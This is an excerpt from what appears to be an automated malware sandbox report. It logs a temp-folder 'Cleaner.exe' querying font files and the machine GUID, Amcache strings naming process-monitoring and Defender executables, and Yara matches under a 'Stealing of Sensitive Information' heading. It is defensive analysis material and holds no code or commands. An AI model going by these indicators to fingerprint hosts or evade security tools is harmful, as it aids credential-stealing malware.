                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.30.drBinary or memory string: c:\users\user\desktop\procexp.exe
                Source: Amcache.hve.30.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.30.drBinary or memory string: procexp.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
